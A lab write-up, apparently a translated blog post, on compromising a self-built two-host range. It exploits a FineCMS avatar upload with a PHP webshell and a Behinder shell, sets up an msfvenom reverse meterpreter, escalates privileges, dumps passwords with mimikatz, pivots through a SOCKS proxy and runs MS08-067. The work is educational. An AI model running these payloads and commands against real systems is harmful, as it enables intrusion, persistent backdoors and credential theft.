Self-built target range 2022
2022-07-05 13:42:00 【Syche】
Contents
1. Introduction to the target range
2. Taking down the web server
2.1 Arbitrary file upload to get a shell
3. Intranet penetration
1. Introduction to the target range
This is a simple intranet-penetration range. You first have to take control of the win2008 server, then pivot into the intranet and take WinXP. There is no flag on win2008; the flag is on WinXP. It exercises a mix of skills, and no protection software (AV/EDR) is deployed, so it counts as a fairly basic range.
The main configuration is as follows:
System | IP address
kali 2020 | 192.168.1.106
win10 (this machine) | 192.168.1.104
win2008 | 192.168.1.107
winxp | 10.101.10.133
Range download:
link: https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw
extraction code: ehs8
PS: bring your own win10 and kali.
Sharing too widely risks the link being blocked, so it is currently limited to 10 downloads; there should not be many people working this range anyway.
2. Taking down the web server
2.1 Arbitrary file upload to get a shell
nmap 192.168.1.107 -p 8069 -sV
Port 8069 is the web port; visiting http://192.168.1.107:8069/ shows that it is FineCMS.
Search Baidu for FineCMS vulnerabilities: the member-area avatar upload is the relevant one.
Register an account on the front end.
First upload a normal avatar and intercept the request to find the upload path. The avatar is submitted as a base64 data URI in the tx parameter, and the server trusts the declared MIME subtype when naming the saved file, so image/php produces a .php file.
<?php @eval($_POST['a']); ?> # one-line PHP webshell (一句话木马); the base64 below encodes it with a leading space
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=
Construct the request as follows:
POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d
tx=data%3Aimage%2Fphp%3Bbase64%2CIDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=
The shell uploaded above can be connected to with China Chopper (中国菜刀) or AntSword (蚁剑).
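To make the upload step concrete, here is an added Python illustration that is not part of the original write-up and is not FineCMS source: it rebuilds the tx= body from the one-line webshell exactly as it appears in the request above, shows a reconstructed version of the vulnerable naming logic (extension taken from the declared subtype, so image/php becomes avatar.php), and puts the hardened check beside it (sniff the decoded bytes, pick the extension from an allowlist, never from user input). The handler logic, function names and the constructed PNG/GIF inputs are assumptions; only the request payload is taken from this page.

```python
"""Added illustration (not FineCMS code): how a data-URI avatar upload that
trusts the declared MIME subtype becomes an arbitrary PHP file write, and
what the server-side check should look like instead. Handler logic and
function names are reconstructed assumptions."""
import base64
import re
import urllib.parse

# Shape carried by the tx parameter: data:<type>/<subtype>;base64,<payload>
DATA_URI = re.compile(
    r"^data:(?P<type>[\w.+-]+)/(?P<subtype>[\w.+-]+);base64,(?P<b64>[A-Za-z0-9+/=]+)$"
)

# Magic bytes of the image formats an avatar endpoint should accept.
IMAGE_MAGIC = (
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)


def parse_data_uri(uri: str):
    """Split a base64 data URI into (type, subtype, decoded bytes)."""
    m = DATA_URI.match(uri)
    if m is None:
        raise ValueError("not a base64 data URI")
    return m["type"], m["subtype"], base64.b64decode(m["b64"], validate=True)


def vulnerable_avatar_filename(uri: str) -> str:
    """Reconstructed vulnerable logic: the only check is that the type word
    is 'image'; the extension is copied from the declared subtype."""
    mime_type, subtype, _data = parse_data_uri(uri)
    if mime_type != "image":
        raise ValueError("not an image")
    return f"avatar.{subtype}"          # image/php -> avatar.php


def hardened_avatar_filename(uri: str) -> str:
    """Hardened logic: ignore the declared type, sniff the decoded bytes and
    derive the extension from an allowlist keyed on what was actually found.
    A GIF89a<?php ...?> polyglot still lands as avatar.gif, not .php."""
    _type, _subtype, data = parse_data_uri(uri)
    for magic, ext in IMAGE_MAGIC:
        if data.startswith(magic):
            return f"avatar.{ext}"
    raise ValueError("decoded content is not a supported image")


def build_upload_body(webshell: bytes, subtype: str = "php") -> str:
    """Rebuild the tx= form body from the request above: the data-URI prefix
    is URL-encoded, the base64 payload is appended unencoded."""
    prefix = urllib.parse.quote(f"data:image/{subtype};base64,", safe="")
    return "tx=" + prefix + base64.b64encode(webshell).decode("ascii")


def tx_to_data_uri(body: str) -> str:
    """Inverse of build_upload_body: strip 'tx=' and URL-decode the rest."""
    if not body.startswith("tx="):
        raise ValueError("not a tx= body")
    return urllib.parse.unquote(body[3:])


if __name__ == "__main__":
    body = build_upload_body(b" <?php @eval($_POST['a']); ?>")
    uri = tx_to_data_uri(body)
    print(body)
    print("vulnerable handler saves:", vulnerable_avatar_filename(uri))
    try:
        hardened_avatar_filename(uri)
    except ValueError as err:
        print("hardened handler rejects:", err)
```

The sniffing check alone is not a complete fix: a file that starts with a real GIF header can still carry PHP after it, which is why the hardened function also takes the extension only from the sniffed type and why such uploads should be stored outside the web root or under a directory that does not execute scripts.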
Here I use Behinder (冰蝎) instead. The base64 in the following request is Behinder's PHP shell (decoded, it reads the raw POST body and decrypts it with AES-128 via openssl_decrypt, falling back to an XOR loop when the openssl extension is missing).
POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d
tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==%3D
From this shell you could also upload an msf-generated exe:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 -f exe -o web.exe
But since we are already on Behinder, bounce the shell directly from it.
2.2 Getting a meterpreter session
Use Behinder's reverse-shell feature to send a meterpreter session back to kali. Start exploit/multi/handler on kali first with the same payload, LHOST and LPORT as the msfvenom command above (192.168.1.106:4444).
2.3 Privilege escalation
migrate <pid> # migrate into a better-privileged process (you need the rights to open it)
run post/multi/recon/local_exploit_suggester # let msf suggest local exploits
run post/windows/gather/enum_patches # enumerate installed patches
# Compare the patch list against a patch-to-exploit lookup page
http://bugs.hacking8.com/tiquan/ # lookup page for privilege-escalation exploits by missing patch
Escalation with RottenPotato inside msf (it relies on the web server's service account holding SeImpersonatePrivilege; check with getprivs first):
execute -HC -f rottenpotato.exe # run the uploaded RottenPotato hidden and channelized; it forges a SYSTEM token
use incognito # load the incognito extension
list_tokens -u # list available tokens by user
impersonate_token "NT AUTHORITY\\SYSTEM" # impersonate the SYSTEM token
2.4 Dumping credentials
The mimikatz (kiwi) and hashdump built into msf gave problems here, so I uploaded a mimikatz build downloaded from GitHub and ran it from a shell to get the plaintext password (on Server 2008, WDigest still caches clear-text credentials in LSASS, which is why sekurlsa::logonpasswords returns it):
cd C:\Users\Administrator\Desktop
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > password.txt
Account | Password
administrator | hacker1961
3. Intranet penetration
3.1 Information gathering
Use ipconfig and arp_scanner from the meterpreter session to discover the second network interface and live hosts.
The intranet segment is 10.101.10.0/24.
The intranet host 10.101.10.133 is discovered.
run autoroute -s 10.101.10.0/24 # add a route to the intranet through this session
run autoroute -p # print the routing table to confirm the route was added
3.2 Configuring the proxy
use auxiliary/server/socks_proxy
Note that the version has to be 4a here, so that it matches the socks4 line in proxychains.conf:
set version 4a
run
vim /etc/proxychains.conf # edit the proxychains configuration so its proxy line points at the msf SOCKS server (socks4 on 127.0.0.1, port 1080 unless you changed SRVPORT)
3.3 Port scanning with nmap
Only TCP connects traverse a SOCKS proxy, so -Pn (skip host discovery) and -sT (connect scan) are required; the original port list had stray spaces that would break the -p argument:
proxychains nmap -Pn -sT 10.101.10.133 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open
3.4 Exploitation
Nothing of interest on port 80, but port 445 is open.
use auxiliary/scanner/smb/smb_version # fingerprint the SMB version
search ms08_067 # MS08-067, a very classic vulnerability
use exploit/windows/smb/ms08_067_netapi
set rhost 10.101.10.133
run
SMB fingerprinting identifies WinXP SP3, so MS08-067 is used. Because the target is only reachable through the pivot route, a reverse payload may not be able to connect back to kali from the 10.101.10.0/24 segment; if that is the case, use a bind payload (for example windows/meterpreter/bind_tcp) so msf connects in through the route.
No privilege escalation is needed here; the exploit already gives SYSTEM.
Get the flag from C:\Documents and Settings\Administrator\Desktop
cd C:\Documents and Settings\Administrator\Desktop
type flag.txt
flag{aGFwcHkgbmV3IHllYXIh}
The flag content is base64; decode it with:
echo "aGFwcHkgbmV3IHllYXIh" | base64 -d
3.5 Remote login
Dump the credentials; this time the mimikatz built into msf works:
load kiwi # load the mimikatz (kiwi) extension
creds_all # dump all credentials
Account | Password
administrator | 123456
Then log in over RDP (3389) through the proxy:
proxychains rdesktop 10.101.10.133
4. Appendix: privilege escalation
While working through this range the author collected some basic privilege-escalation notes.
4.1 Local escalation
NSudoLC escalation
# Project description
https://nsudo.m2team.org/zh-hans/
# Project address
https://github.com/Thdub/NSudo_Installer
Use the x64 NSudoLC.exe (NSudoLG.exe is the GUI version); the latest release can still escalate locally on current win10.
NSudoLC.exe -U:S -P:E web.exe # -U:S runs as SYSTEM, -P:E enables all privileges
This requires an administrator context to begin with; it takes you from administrator to SYSTEM rather than exploiting a vulnerability.
BitsArbitraryFileMoveExploit.exe escalation
This is a local privilege escalation disclosed in 2020 (CVE-2020-0787, the BITS arbitrary file move; see the links at the end). Many versions are affected, including the then-current win10, so it is a comparatively recent escalation. Its limitation is that it can only be run interactively by double-clicking: it pops up a SYSTEM-privilege window instead of handing a shell back.
4.2 Escalation from a remote shell
Section 2.3 of this post escalated with RottenPotato inside msf; here is another way.
Upload cve-2019-1458.exe
Then run cve-2019-1458.exe web.exe
This launches web.exe (the msf payload generated earlier) as SYSTEM and returns a SYSTEM meterpreter.
Privilege escalation can be grouped into several categories:
Escalation through system vulnerabilities (either local exploits run on the box, or exploits triggered from a remote shell)
Process migration (msf migrate)
bypassuac escalation (msf integrated modules)
Token stealing (RottenPotato)
Database escalation (using database root privileges to run commands and reach the highest privileges)
Links used in this article:
Kernelhub/CVE-2020-0787 at master - iNarcissuss/Kernelhub - GitHub
Kernelhub/cve-2019-1458.exe at master - Ascotbe/Kernelhub - GitHub
The author of this article :
sm